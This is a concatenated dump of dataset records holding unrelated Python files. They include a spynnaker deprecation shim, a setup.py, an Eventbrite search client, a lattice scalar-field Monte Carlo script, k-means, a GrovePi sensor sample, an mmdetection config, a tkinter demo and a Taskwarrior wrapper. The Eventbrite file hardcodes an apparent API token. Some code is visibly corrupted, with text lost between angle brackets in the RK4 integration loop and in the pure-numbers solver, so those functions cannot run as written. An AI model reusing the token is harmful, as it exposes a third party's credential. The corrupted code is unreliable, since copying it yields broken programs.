datastore_mock, storage_mock, emails, resource):\n def store_objects(objs):\n self.stored_ids = list(objs)\n return resource\n self.stored_ids = []\n datastore_mock.fetch_pending_emails.return_value = emails\n storage_mock.store_objects.side_effect = store_objects\n","sub_path":"tests/opwen_email_server/api/test_client_read.py","file_name":"test_client_read.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"92018514","text":"# Copyright (c) 2021 The University of Manchester\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom pyNN.standardmodels.synapses import StaticSynapse\nfrom spynnaker.pyNN.models.neuron.synapse_dynamics import (\n SynapseDynamicsStructuralSTDP as\n _BaseClass)\nfrom spynnaker.pyNN.models.neuron.synapse_dynamics.\\\n synapse_dynamics_structural_common import (\n DEFAULT_F_REW, DEFAULT_INITIAL_WEIGHT, DEFAULT_INITIAL_DELAY,\n DEFAULT_S_MAX)\nfrom spynnaker.pyNN.utilities.utility_calls import moved_in_v6\n\n\nclass SynapseDynamicsStructuralSTDP(_BaseClass):\n \"\"\"\n .. deprecated:: 6.0\n Use\n :py:class:`spynnaker.pyNN.models.neuron.synapse_dynamics.SynapseDynamicsStructuralSTDP`\n instead.\n \"\"\"\n __slots__ = []\n\n def __init__(\n self, partner_selection, formation, elimination,\n timing_dependence=None, weight_dependence=None,\n voltage_dependence=None, dendritic_delay_fraction=1.0,\n f_rew=DEFAULT_F_REW, initial_weight=DEFAULT_INITIAL_WEIGHT,\n initial_delay=DEFAULT_INITIAL_DELAY, s_max=DEFAULT_S_MAX,\n seed=None, weight=StaticSynapse.default_parameters['weight'],\n delay=None, backprop_delay=True):\n \"\"\"\n :param AbstractPartnerSelection partner_selection:\n The partner selection rule\n :param AbstractFormation formation: The formation rule\n :param AbstractElimination elimination: The elimination rule\n :param AbstractTimingDependence timing_dependence:\n The STDP timing dependence rule\n :param AbstractWeightDependence weight_dependence:\n The STDP weight dependence rule\n :param None voltage_dependence:\n The STDP voltage dependence (unsupported)\n :param float dendritic_delay_fraction:\n The STDP dendritic delay fraction\n :param int f_rew: How many rewiring attempts will be done per second.\n :param float initial_weight:\n Weight assigned to a newly formed connection\n :param initial_delay:\n Delay assigned to a newly formed connection; a single value means\n a fixed delay value, or a tuple of two values means the delay will\n be chosen at random from a uniform distribution between the given\n values\n :type initial_delay: float or tuple(float, float)\n :param int s_max: Maximum fan-in per target layer neuron\n :param int seed: seed the random number generators\n :param float weight: The weight of connections formed by the connector\n :param delay: The delay of connections formed by the connector\n :type delay: float or None\n \"\"\"\n moved_in_v6(\"spynnaker8.models.synapse_dynamics.\"\n \"SynapseDynamicsStructuralSTDP\",\n \"spynnaker.pyNN.models.neuron.synapse_dynamics\"\n \".synapseDynamicsStructuralSTDP\")\n _BaseClass.__init__(\n self, partner_selection, formation, elimination,\n timing_dependence=timing_dependence,\n weight_dependence=weight_dependence,\n voltage_dependence=voltage_dependence,\n dendritic_delay_fraction=dendritic_delay_fraction, f_rew=f_rew,\n initial_weight=initial_weight, initial_delay=initial_delay,\n s_max=s_max, seed=seed, weight=weight, delay=delay,\n backprop_delay=backprop_delay)\n","sub_path":"spynnaker8/models/synapse_dynamics/synapse_dynamics_structural_stdp.py","file_name":"synapse_dynamics_structural_stdp.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503918385","text":"from setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\n\nwith open(path.join(path.abspath(path.dirname(__file__)), 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='couchbase-stress-testing',\n\n version='1.0.0',\n\n description='Couchbase stress test',\n long_description=long_description,\n\n url='https://github.com/Travix-International/couchbase-stress-testing',\n\n # Author details\n author='Travix Internationals',\n author_email='malsharbaji@travix.com',\n\n # Choose your license\n license='MIT',\n\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n ],\n\n keywords='couchbase stress testing',\n\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n\n install_requires=[\n 'couchbase',\n 'requests'\n ],\n\n entry_points={\n 'console_scripts': [\n 'couchbase-stress-test=couchbase_stress_test.__init__:main',\n ],\n },\n)","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"152334295","text":"import urllib.request # urllib.request.urlopen(url)\nimport urllib.parse # urllib.parse.urlencode((parameter, value))\nimport json\n\n\nTOKEN = '77GNIJFPL3PU4ASPFJV5'\nBASE_URL = 'https://www.eventbriteapi.com/v3/events/search/?'\n\ndef build_url(search_query: str, sort_by: str, location_address: str, location_within: str, price: str) -> str:\n \n parameters = urllib.parse.urlencode([('token', TOKEN),('q', search_query),('sort_by', sort_by), ('location.address', location_address), ('location.within', location_within), ('price', price)])\n return BASE_URL + parameters\n\ndef get_dict_from_json(url: str) -> dict:\n response = None\n try:\n response = urllib.request.urlopen(url)\n return json.loads(response.read().decode(encoding = 'utf-8'))\n finally:\n if response != None:\n response.close()\n \ndef parse(json_text: 'json text') -> list:\n result_list = []\n for event in range(len(json_text['events'])):\n try:\n result_list.append(json_text['events'][event]['name']['text']) # can return 'text' or 'html'\n except:\n pass\n return result_list\n \n\n# Test\n# test = parse(get_dict_from_json(build_url('concert', 'date', 'Irvine', '10mi', 'free')))\n# for event in test:\n# print(event)","sub_path":"mysite/mysite/EventBriteAPIModule.py","file_name":"EventBriteAPIModule.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"335756223","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\nimport scipy.interpolate as si\nimport numpy.linalg as alg\nfrom math import isfinite\nimport sys\n\n# This code reproduces the algorithm describe in arXiv:1205.3996v4\n# It describes a scalar field under small chemical potential\n# The vector for the position must be given as a list of dimension dim\n\n\n############################ Parameters #######################################\nd = 2 # Dimension of the spatial lattice - d >= 2\nmass = 1 # Mass of the complex scalar field\nmu = float(sys.argv[1]) # Chemical potential\ninteraction = 1 # Value of lambda for the interaction part \nL = 3 # Lattice size x is in [0,L-1]^dim\n#epsilon = 1e-4 # Stepsize for the noise - suff. small for hess. approx\nT = float(sys.argv[2]) # Final time for the integration\nn = int(L**d)\ndr0 = 0.01 # Stepsize for integration\ndr_max=0.1\nprecision = 1e-8\nf = 0.95\nN=100\n\n############################ Useful methods ###################################\n\n# The first step consist in finding the eigenvector in direct space\n\n# Convention in the code - Important to read\n# a vector (0,1,2 ... n=L**d=9) represent the point on the lattice in this manner\n# 0 1 2 -> axis 0\n# ( 3 4 5 ) and a position vector has inverse coordinate[id, ..., i1,i0]\n# 6 7 8 so index 2 corresponds to [ 0 2 ] in lattice 3x3\n# | axis 1 go to the bottom\n\ndef position(m):\n \"\"\" Return the position vector on the lattice in function of the place in the vector\n for example the position 6 in basis L=2 and d=3 correspond to\n the position vector [1 1 0]\n It correponds to the conversion from basis 10 to basis L\n \"\"\"\n global L\n x = np.zeros(d,dtype=int)\n i=0\n while(m>0):\n L,m = int(L),int(m)\n x[d-i-1]=m%L\n m = m//L\n i += 1\n p = np.array(x)\n return p\n\ndef index(x):\n \"\"\" Return the place in the vector in function of the position\n The reverse operation from position.\n \"\"\"\n result = 0\n for i in range(len(x)):\n result += x[i]*L**(d-i-1)\n return result\n\ndef kron(a,b):\n if a==b:\n return 1\n else:\n return 0\n\ndef kronecker_pos(x,nu,y):\n \"\"\" Return the kronecker d(x+nu,y). nu cannot be negative.\n x,y are between 0 and n-1, nu between 0 and d-1 \"\"\"\n xp = position(x)\n yp = position(y)\n nu = int(nu)\n add = np.zeros(d,dtype=np.complex)\n add[d-1-nu] = 1\n result = xp + add\n if (result==yp).all():\n return 1\n else:\n return 0\n\ndef kronecker_neg(x,nu,y):\n \"\"\" Return the kronecker d(x-nu,y). nu cannot be negative.\n x,y are between 0 and n-1, nu between 0 and d-1 \"\"\"\n xp = position(x)\n yp = position(y)\n nu = int(nu)\n add = np.zeros(d,dtype=np.complex)\n add[d-1-nu] = -1\n result = xp + add\n if (result==yp).all():\n return 1\n else:\n return 0\n\ndef neighbour_pos(lattice,mu):\n \"\"\" Return the lattice of the neighbour in positive direction mu with\n increment 1 \"\"\"\n result = np.zeros(n,dtype=np.complex)\n for i in range(n):\n p = position(i)\n if p[d-1-mu]==L-1:\n p[d-1-mu] = 0\n else:\n p[d-1-mu] += 1\n ind = int(index(p))\n result[i] = lattice[ind]\n return result\n\ndef neighbour_neg(lattice,mu):\n \"\"\" Return the lattice of the neighbour in negative direction mu with\n increment 1 \"\"\"\n result = np.zeros(n,dtype=np.complex)\n for i in range(n):\n p = position(i)\n if p[d-1-mu]==0:\n p[d-1-mu] = L-1\n else:\n p[d-1-mu] -= 1\n ind = int(index(p))\n result[i] = lattice[ind]\n return result\n\n\n\ndef real_evolution(p,q):\n \"\"\" Return the value of the \"real\" part of the derivative of the\n complex conjugated action \"\"\"\n sumoverspace = 0\n for i in range(n):\n sumoverspace += p[i]**2 + q[i]**2\n a = (2*d+mass**2+interaction*sumoverspace)*p\n b = 0\n for nu in range(d):\n b -= np.cosh(mu*kron(nu,0))*(neighbour_pos(p,nu)+neighbour_neg(p,nu))\n b += 1j*np.sinh(mu*kron(nu,0))*(neighbour_neg(q,nu)+neighbour_pos(q,nu))\n result = a+b\n return result\n\ndef imag_evolution(p,q):\n \"\"\" Return the value of the \"real\" part of the derivative of the\n complex conjugated action \"\"\"\n sumoverspace = 0\n for i in range(n):\n sumoverspace += p[i]**2 + q[i]**2\n a = 2*d + mass**2 + interaction*sumoverspace*q\n b = 0\n for nu in range(d):\n b -= np.cosh(mu*kron(nu,0))*(neighbour_pos(q,nu)+neighbour_neg(q,nu))\n b += 1j*np.sinh(mu*kron(nu,0))*(neighbour_pos(p,nu)-neighbour_neg(p,nu))\n result = a+b\n return result\n\ndef delta_phi(phi1,phi2):\n result = 0\n for i in range(n):\n result+= R[i,0,0]*(phi1[i]**2+phi2[i]**2 + 2*phi1[i]**2)\n result+= R[i,1,1]*(phi1[i]**2+phi2[i]**2 + 2*phi2[i]**2)\n result+= R[i,0,1]*(2*phi1[i]*phi2[i])\n result+= R[i,1,0]*(2*phi1[i]*phi2[i])\n return np.conj(result)\n\ndef TraceHprim(phi1,phi2):\n return (sum_lambda - delta_phic) + delta_phi(phi1,phi2)\n\ndef RK4_step(phi1,phi2,r,dr):\n \"\"\" Return the result of one step RK4 starting from pi,qi\n at position r with step dr \"\"\"\n pi = phi1\n qi = phi2\n p1 = real_evolution(pi,qi)*dr\n q1 = imag_evolution(pi,qi)*dr\n p2 = real_evolution(pi+0.5*p1,qi+0.5*q1)*dr\n q2 = imag_evolution(pi+0.5*p1,qi+0.5*q1)*dr\n p3 = real_evolution(pi+0.5*p2,qi+0.5*q2)*dr\n q3 = imag_evolution(pi+0.5*p2,qi+0.5*q2)*dr\n p4 = real_evolution(pi+p3,qi+q3)*dr\n q4 = imag_evolution(pi+p3,qi+q3)*dr\n p_next = pi + 1.0/6.0*(p1+2.0*p2+2.0*p3+p4) # Evolution of q\n q_next = qi + 1.0/6.0*(q1+2.0*q2+2.0*q3+q4)\n return p_next,q_next\n\ndef RK4(phi1_0,phi2_0):\n \"\"\" Runge-Kutta order 4 method with adaptative stepsize\n Return the last value p,q, real and imaginary part of the solution\n and the list of r and the corresponding hessian value.\"\"\"\n finite = True\n r=0\n dr = dr0\n r_list = []\n #phi1_list = []\n #phi2_list = []\n det = sum_lambda\n phi1,phi2 = phi1_0,phi2_0\n while r dr_max:\n dr = dr_max\n r = r + dr_old\n if r+dr > T:\n dr = T-r\n phi1,phi2 = RK4_step(phi1_next,phi2_next,r,dr)\n det += trH*dr\n r = T\n #r_list.append(r)\n #phi1_list.append(phi1)\n #phi2_list.append(phi2)\n else:\n phi1,phi2 = phi1_next, phi2_next\n det += trH\n #r_list.append(r)\n #phi1_list.append(phi1)\n #phi2_list.append(phi2)\n else:\n dr = f*dr*(precision/tmp)**0.2\n return phi1, phi2, det, finite\n\ndef S(phi1,phi2):\n result = 0\n a = (d+mass**2/2+interaction/4)*(phi1**2+phi2**2)\n c = 0\n for nu in range(d):\n c -= np.cosh(mu*kron(nu,0))*(phi1*neighbour_pos(phi1,nu)\\\n + phi2*neighbour_pos(phi2,nu))\n c-= 1j*np.sinh(mu*kron(nu,0))*(neighbour_pos(phi1,nu)*phi2\\\n -neighbour_pos(phi2,nu)*phi1)\n for i in range(n):\n result += a[i] + c[i]\n return result\n\ndef effective_Action(phi1, phi2 ,det_jac):\n return S(phi1,phi2) - np.log(abs(det_jac))\n\ndef Metropolism(phi1_old, phi2_old, det_jac_old, phi1_new, phi2_new, det_jac_new):\n test = np.exp(-effective_Action(phi1_new, phi2_new, det_jac_new)\\\n +effective_Action(phi1_old, phi2_old,det_jac_old))\n proba = min(1,test)\n x = np.random.random()\n return x 0:\n sum_lambda += w[i]\n positive_eigenspace.append(v[:,i])\n for j in range(n):\n # Note that the eigenvector is v[:,i]\n phi1[j] = v[j,i] + 1j*v[j+2*n,i]\n phi2[j] = v[j+n,i] + 1j*v[j+3*n,i]\n positive_eigenspace_1.append(phi1)\n positive_eigenspace_2.append(phi2)\n\nprint('The dimension of the positive eigenspace is'\n ,len(positive_eigenspace_1))\n\n## Construction of Pn\n#Pn = np.zeros(shape=(2*n,2*n),dtype=np.complex)\n#for i in range(2*n):\n# for j in range(2*n):\n# Pn[j,i] = positive_eigenspace[i][j]\n\n# Here is calculated the stuff needed for the jacobian evo.\n# First the Rx_a,b matrix\nR= []\nfor i in range(n):\n Mab = np.zeros((2,2),dtype=np.complex)\n for j in range(len(positive_eigenspace)):\n Mab[0,0] += positive_eigenspace_1[j][i]**2\n Mab[0,1] += positive_eigenspace_1[j][i]\\\n *positive_eigenspace_2[j][i]\n Mab[1,0] += Mab[0,1]\n Mab[1,1] += positive_eigenspace_2[j][i]**2\n R.append(Mab)\nR = np.array(R)\n# Here calculated the delta_phic\n\nphi1_c = np.zeros(n,dtype=np.complex)\nphi2_c = np.zeros(n,dtype=np.complex)\n\ndelta_phic = delta_phi(phi1_c,phi2_c)\n\nconfig = []\n\n# Initial config at critical point\nphi_0_1 = np.zeros(n,dtype=np.complex)\nphi_0_2 = np.zeros(n,dtype=np.complex)\n#det_0 = alg.det(Pn)\ndet_0 = sum_lambda\ninitial_config = [phi_0_1,phi_0_2,det_0]\n\nconfig.append(initial_config)\nimagS = []\n\nfor i in range(N):\n # Here begins the loop for the N iterations\n print('New iteration')\n phi1, phi2 = proposal(positive_eigenspace_1),\\\n proposal(positive_eigenspace_2)\n phi1,phi2, det ,finite = RK4(phi1,phi2)\n while not(finite):\n phi1, phi2 = proposal(positive_eigenspace_1),\\\n proposal(positive_eigenspace_2)\n phi1, phi2, det, finite = RK4(phi1,phi2)\n print(det)\n #det = alg.det(jacobian_evolution(Pn,r_list,phi1_list,phi2_list))\n if Metropolism(phi_0_1,phi_0_2,det_0,phi1,phi2,det):\n phi_0_1 = phi1\n phi_0_2 = phi2\n det_0 = det\n config.append([phi_0_1,phi_0_2,det_0])\n imagS.append(np.imag(S(phi_0_1,phi_0_2)))\n print('Done !')\n print('ImS = ', np.imag(S(phi1,phi2)))\n\nwith open(\"data/config_mu_{0}_T_{1}.txt\".format(mu,T),\"wb\") as fp:\n pickle.dump(config,fp)\n","sub_path":"phi4mu_jac.py","file_name":"phi4mu_jac.py","file_ext":"py","file_size_in_byte":13720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"297726165","text":"import numpy as np\nimport NanoImagingPack as nip\nimport matplotlib.pyplot as plt\nfrom phase_retrieval import fienup_phase_retrieval\n\n\necoli = 'e-coli.png'\nbeads = 'beads_.png'\nfile = ecoli\nobj = nip.readim(file)\nobj = np.squeeze(obj)\nobj = np.mean(obj, axis=0)\n#obj = obj.max() - obj\nnip.view(obj)\n\n#illumination\nsz = obj.shape\nszn = np.array(sz)\nftradius = 5.0\nmyscales = ftradius / szn\nasf = nip.jinc(szn, myscales) # Fourier pattern for pinhole with radius ftradius\nasf = asf / asf.midVal() * np.pi * ftradius ** 2 * nip.gaussian(asf.shape,sigma = 50) # normalize\npsf = nip.abssqr(asf)\npsf /= psf.max()\nnip.view(psf)\n\n'''\ndx=-1\ndy=-1\ncrop_shape=(200,200)\nblocked_area = nip.rr(obj.shape)>1\nblocked_area = nip.extract(blocked_area,crop_shape, centerpos=(blocked_area.shape[0]//2 + dy,blocked_area.shape[1]//2 + dx))\nblocked_area = nip.extract(blocked_area,obj.shape,PadValue=1)\nnip.view(blocked_area)\n'''\n\npimg = nip.abssqr(nip.ft2d(obj*psf))\nphotons = 1000\nnimg = nip.noise.poisson(pimg, NPhot=photons)\n\n#pimg*=blocked_area\n#pimg = nip.extract(np.abs(nip.ft2d(obj*mask)),crop_shape, centerpos=(obj.shape[0]//2 + dy,obj.shape[1]//2 + dx))\n#mask = nip.extract(mask,pimg.shape)\nsupport = nip.rr(obj.shape)<200\n\nresult, evol = fienup_phase_retrieval(nimg,mask=support, steps=500,\n verbose=True)\nnip.view(obj*psf)\nnip.view(evol)\n","sub_path":"single-Intensity-ptychography.py","file_name":"single-Intensity-ptychography.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375202171","text":"import sys\n\nsame_average = False\ncnt = 0\nk = sys.argv[1]\n\ndef argu_check(k,max_iter=200):\n if(('.' in k) or int(k) < 0):\n print(\"Invalid Input\")\n assert()\n if(max_iter != 200):\n if(('.' in max_iter) or int(max_iter) < 0):\n print(\"Invalid Input\")\n assert()\n return int(max_iter)\n\ntry:\n max_iter = sys.argv[2]\n max_iter = argu_check(k,max_iter)\nexcept IndexError:\n max_iter = argu_check(k)\n\nk = int(sys.argv[1])\nclusters = [[] for i in range(k)]\n\ndata_points = []\n\nline = input()\nwhile (line != EOFError):\n data_points.append([float(xi) for xi in line.split(\",\")])\n try: \n line = input()\n except EOFError:\n break\n\nfor i in range(k):\n clusters[i].append(list.copy(data_points[i])) \n clusters[i].append(0)\n clusters[i].append([0.0 for xi in range(len(data_points[i]))])\n\ndef Euclidian_Distance(vector, centroid):\n sum = 0.0\n for xi in range(len(vector)):\n sum += pow((vector[xi]-centroid[xi]),2)\n return sum\n\ndef Update_Mean(clusters, same_average):\n for i in range(k):\n for j in range(len(clusters[i][2])):\n if(clusters[i][2][j]/clusters[i][1] != clusters[i][0][j]):\n same_average = False\n clusters[i][0][j] = clusters[i][2][j]/clusters[i][1]\n return same_average\n\n\ndef Update_Sum_Of_Elements_In_Cluster(float_vector, loc, clusters):\n for i in range(len(float_vector)):\n clusters[loc][2][i] += float_vector[i]\n\ndef Finding_Cluster(float_vector, clusters):\n min_distance, num_of_cluster = -1, -1\n for i in range(k):\n distance = Euclidian_Distance(float_vector, clusters[i][0])\n if((distance < min_distance) or (min_distance < 0)): #distance is smaller or we are doing the first calc of distance\n min_distance = distance\n num_of_cluster = i\n \n clusters[num_of_cluster][1] += 1 #update number of elements in cluster\n Update_Sum_Of_Elements_In_Cluster(float_vector, num_of_cluster, clusters)\n\n\n \nwhile (cnt < max_iter) and (not same_average):\n same_average = True #will be changed to False if one of the means change\n for vector in data_points:\n Finding_Cluster(vector, clusters)\n same_average = Update_Mean(clusters, same_average) #check if there's no change in mu\n \n for cluster in clusters:\n cluster[1] = 0\n cluster[2] = [0.0 for x in cluster[2]] #initializing clusters properties before next iteration\n\n cnt += 1\n\nfor cluster in clusters:\n print(*[\"{:.4f}\".format(num) for num in cluster[0]],sep=\",\")\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"kMeans.py","file_name":"kMeans.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"194447374","text":"import time\nimport traceback\nfrom grovepi import grovepi\n\nfrom cisco_deviot.gateway import Gateway\nfrom cisco_deviot.thing import Thing\nfrom cisco_deviot.thing import Property\nfrom cisco_deviot import constants\n\npin = {\"A0\":14, \"A1\":15, \"A2\":16, \"D2\":2, \"D3\":3, \"D4\":4, \"D5\":5, \"D6\":6, \"D7\":7, \"D8\":8}\n\n# connect each sensor to a pin \nlight_sensor_pin = pin[\"A2\"]\nled_pin = pin[\"D3\"] \nultrasonic_sensor_pin = pin[\"D4\"]\ntemperature_sensor_pin = pin[\"D7\"]\nbutton_sensor_pin = pin[\"D8\"]\n\ngrovepi.pinMode(light_sensor_pin, \"INPUT\")\ngrovepi.pinMode(led_pin, \"OUTPUT\")\ngrovepi.pinMode(ultrasonic_sensor_pin, \"INPUT\")\ngrovepi.pinMode(temperature_sensor_pin, \"INPUT\")\ngrovepi.pinMode(button_sensor_pin, \"INPUT\")\n\n \n# turn on/off the led when receive action from DevIot\n# action name will be 'on' or 'off'\ndef trigger_grove_led(action):\n print('led get action:' + action)\n if action == 'on':\n return lambda:grovepi.digitalWrite(led, 1)\n else:\n return lambda:grovepi.digitalWrite(led, 0)\n\naccount = 'your_id@cisco.com'\napp = Gateway('grovepi', 'deviot.cisco.com', 'deviot.cisco.com:18883', account)\n\n# the parameters of a Thing constructor are: id, display name, kind\nlight_sensor = Thing('grove_light', 'GroveLight', 'light')\nlight_sensor.add_property('light')\nultrasonic_sensor = Thing('grove_distance', 'GroveDistance', 'distance')\nultrasonic_sensor.add_property('distance')\ntemperature_sensor = Thing('grove_temp_hum', 'GroveTempHumd', 'temperature')\ntemperature_sensor.add_property('temperature', 'humidity')\nbutton_sensor = Thing('grove_button', 'GroveButton', 'button')\nbutton_sensor.add_property(Property('value', constants.PROPERTY_TYPE_BOOL))\nled = Thing('grove_led', \"GroveLED\", led)\nled.add_action('on', 'off')\nled.on = trigger_grove_led('on')\nled.off = trigger_grove_led('off')\n\napp.register(light_sensor, ultrasonic_sensor, temperature_sensor, button_sensor, led)\n\napp.start()\n\nwhile True:\n try:\n light_value = grovepi.analogRead(light_sensor_pin)\n [temperature_value, humidity_value] = grovepi.dht(temperature_sensor_pin, 0)\n distance_value = grovepi.ultrasonicRead(ultrasonic_sensor_pin)\n button_value = grovepi.digitalRead(button_sensor_pin)\n \n light_sensor.update_property(light=light_value)\n app.update_thing(light_sensor, light=light_value)\n app.update_thing(temperature_sensor, temperature=temperature_value, humidity=humidity_value)\n app.update_thing(ultrasonic_sensor, distance=distance_value)\n app.update_thing(button_sensor, value=button_value)\n\n time.sleep(0.3)\n except:\n traceback.print_exc()\n break\n\napp.stop()","sub_path":"sample_code_for_GrovePi_sensor.py","file_name":"sample_code_for_GrovePi_sensor.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"321947523","text":"product_family = 'code_activator'\nquestion_type = 'input_output'\nhotspot_declarations = {'$out0': 'string'}\ndisplay = r'''\ndef gen_lambda(n):\n\treturn lambda x: n*x\n\nprint gen_lambda(1)(7)\n'''\nargvs = r''''''\nstdin = r''''''\nstdout = r'''$out0\n'''\n","sub_path":"cqg/question_library/python/generate_lambda_io_17/cqg_config.py","file_name":"cqg_config.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"352186359","text":"def Solve (N):\n # your code goes here\n arr, i, start = [\"44\",\"55\"], 2, 1\n if i>=N:\n return arr[N-1]\n while i=N:\n arr=temp\n break\n temp += [\"5\" + a + \"5\" for a in arr]\n i += len(temp)\n arr = temp\n return arr[N-start-1]\n\n\nT = input()\nfor _ in range(T):\n N = input()\n\n out_ = Solve(N)\n print(out_)","sub_path":"LeetCode/InterviewQuestions/PureNumbers.py","file_name":"PureNumbers.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"628797992","text":"_base_ = [\n '../_base_/models/mask_rcnn_r50_fpn.py',\n '../_base_/datasets/coco_instance.py',\n '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'\n]\n# optimizer\nmodel = dict(\n backbone=dict(\n _delete_=True,\n type='PyramidVisionTransformerV2',\n embed_dims=32,\n num_layers=[2, 2, 2, 2],\n init_cfg=dict(\n checkpoint= # noqa\n 'https://github.com/whai362/PVT/releases/download/v2/pvt_v2_b0.pth' # noqa\n )),\n neck=dict(\n type='FPN',\n in_channels=[32, 64, 160, 256],\n out_channels=256,\n num_outs=5),\n rfsearch_cfg=dict(\n mode='fixed_multi_branch',\n rfstructure_file= # noqa\n './configs/rfnext/search_log/mask_rcnn_pvtv2-b0_fpn_1x_coco/local_search_config_step10.json', # noqa\n config=dict(\n search=dict(\n step=0,\n max_step=11,\n search_interval=1,\n exp_rate=0.5,\n init_alphas=0.01,\n mmin=1,\n mmax=24,\n num_branches=2,\n skip_layer=[])),\n ))\n\n# optimizer\noptimizer = dict(_delete_=True, type='AdamW', lr=0.0002, weight_decay=0.0001)\noptimizer_config = dict(grad_clip=None)\n\ncustom_hooks = [\n dict(\n type='RFSearchHook',\n config=model['rfsearch_cfg']['config'],\n mode=model['rfsearch_cfg']['mode'],\n )\n]\n","sub_path":"PanoSeg/RF-mmdetection/configs/rfnext/rfnext_fixed_multi_branch_mask_rcnn_pvtv2-b0_fpn_1x_coco.py","file_name":"rfnext_fixed_multi_branch_mask_rcnn_pvtv2-b0_fpn_1x_coco.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"446107041","text":"from tkinter import *\r\nroot=Tk()\r\nroot.title(\"creating panels or panedwindows\")\r\nroot.geometry(\"500x500\")\r\n#panels\r\npanel_1=PanedWindow(bd=4,relief=RAISED,bg=\"red\")\r\npanel_1.pack(fill=BOTH,expand=1)\r\n\r\nleft_label=Label(panel_1,text=\"Left Panel\")\r\npanel_1.add(left_label)\r\n\r\n#creating second panel\r\npanel_2=PanedWindow(panel_1,orient=VERTICAL,bd=4,relief=RAISED,bg=\"blue\")\r\npanel_1.add(panel_2)\r\n\r\ntop=Label(panel_2,text=\"Top Panel\")\r\npanel_2.add(top)\r\n\r\nbottom=Label(panel_2,text=\"Bottom Panel\")\r\npanel_2.add(bottom)\r\n\r\nroot.mainloop()\r\n","sub_path":"28creating_panedwindows.py","file_name":"28creating_panedwindows.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"184316631","text":"from .commands import Command\nimport shlex\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter.messagebox import *\nimport subprocess\nimport json\n\nclass TaskAPI:\n\tdef __init__(self, logging=False):\n\t\tself.logging = logging\n\t\t\n\tdef fprint(self, message):\n\t\tif self.logging:\n\t\t\tprint(message)\n\t\t\t\n\tdef _formatOutput(self, data):\n\t\tself.fprint(data)\n\t\ttry:\n\t\t\treturn json.loads(data)\n\t\texcept:\n\t\t\treturn str(data, 'latin-1')\n\t\t\n\tdef cmd(self, command):\n\t\tself.fprint(f\"Executing {command}\")\n\t\tif not command.startswith(\"task \"):\n\t\t\tcommand = f\"task {command}\"\n\t\t\t\n\t\tcommand = f\"{command} rc.confirmation:0\"\n\t\tself.fprint(f\"Command finalized: {command}\")\n\t\t\n\t\tf = subprocess.run(command.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n\t\t\t\n\t\tif f.stdout:\n\t\t\treturn self._formatOutput(f.stdout)\n\t\telse:\n\t\t\treturn self._formatOutput(f.stderr)\n\t\t\n\tdef add(self, description):\n\t\treturn self.cmd(f'task add {description}')\n\t\n\tdef done(self, _id):\n\t\treturn self.cmd(f'task done {_id}')\t\n\t\n\tdef delete(self, _id):\n\t\treturn self.cmd(f'task delete {_id}')\t\t\n\t\n\tdef export(self, _id = \"\"):\n\t\tif _id:\n\t\t\tf = f'task {str(_id)} export'\n\t\telse:\n\t\t\tf = 'task export'\n\t\t\t\n\t\treturn self.cmd(f)\n\t\t\n\tdef get(self, dom):\n\t\treturn self.cmd(f'task _get {dom}')\n\t\nclass ShowTasks(Command):\n\tdef __init__(self, manager):\n\t\tsuper().__init__(manager)\n\t\tself.alias = ['show tasks', 'list tasks', 'check tasks', 'check task', 'show task']\n\t\tself.check = self.checkMulti\n\t\t\n\tdef run(self, message):\n\t\tt = TaskAPI()\n\t\tresp = t.export(message)\n\t\trespf = self.manager.say\n\t\tif message == \"\":\n\t\t\tself.manager.say(\"Here is a list of your tasks.\")\n\t\t\trespf = self.manager.printf\n\t\t\n\t\tfor item in resp:\n\t\t\tif item['status'] != 'deleted' and item['status'] != 'completed':\n\t\t\t\tproject = \"\"\n\t\t\t\tif item.get('project', None):\n\t\t\t\t\tproject = f\" 